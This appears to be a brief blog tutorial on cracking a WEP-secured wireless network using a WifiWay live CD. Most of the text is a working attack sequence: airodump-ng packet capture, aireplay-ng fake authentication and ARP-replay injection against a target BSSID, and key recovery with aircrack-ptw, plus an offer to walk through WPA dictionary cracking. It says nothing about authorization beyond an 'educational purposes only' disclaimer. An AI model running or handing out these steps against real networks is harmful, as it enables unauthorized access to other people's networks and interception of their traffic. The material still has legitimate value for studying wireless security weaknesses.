Apr 21
Disclaimer: This is for Educational purposes only. I am not responsible for how you or anyone else uses the following information. Check the laws in your country.
In order to hack a wireless network secured with WEP you will need a few tools:
- A wireless card that can go into monitor mode (I have an Intel PRO/Wireless 3945ABG)
- Note: To dump data and crack the key in Windows I would recommend OmniPeek Personal to capture the data (it will put your driver in monitor mode and restore it when you close the application) together with the driver in the note below
- Note: For my wireless card I needed to get an older driver. This older driver supports the much needed monitor mode. If you need this driver I have hosted it here. This is for Windows. However, this tutorial will teach you how to crack it in Linux via a Live CD.
- A Linux live CD (I used: WifiWay version 1.0 Beta2 from here)
- After booting up type in: startx
- Note: All the text will be in Spanish. Go to the KDE menu and change the regional/language settings to English if you need to. Also, in the taskbar at the bottom right, change the flag from Spain's flag to the U.S. flag if you want the US keyboard layout to work properly in the terminal.
- airodump-ng - To dump the packets to a file
- aireplay-ng - To increase the data packets
- aircrack-ptw - To crack the password
Now that you have all these tools you will need to do the following (Assuming you are using the WifiWay CD):
- Type in a terminal: airodump-ng rtap0
- Type in another terminal: airodump-ng -w packets rtap0 to start dumping the packets
- Type in another terminal: ifconfig wifi0 up
- Type: ifconfig to get our MAC address
- Type in another terminal: aireplay-ng -1 0 -a BSSID -h Our MAC -e ESSID wifi0 (this is to do a handshake)
- Type: aireplay-ng -3 -b BSSID -e ESSID -h Our MAC wifi0 (this is to inject more traffic and drive up the number of packets)
- Once you have a lot of packets (over 250,000 is recommended for the highest possible bit WEP key) type in: aircrack-ptw packets.cap
- Voila you have the key. It is in hex format.
- If you need to do a hex to ASCII conversion you can do it here.
Note: If you want to crack WPA, it is the same thing, except when you crack it, you will need to use a dictionary attack. If anyone really wants me to walk through this I will, just leave a comment.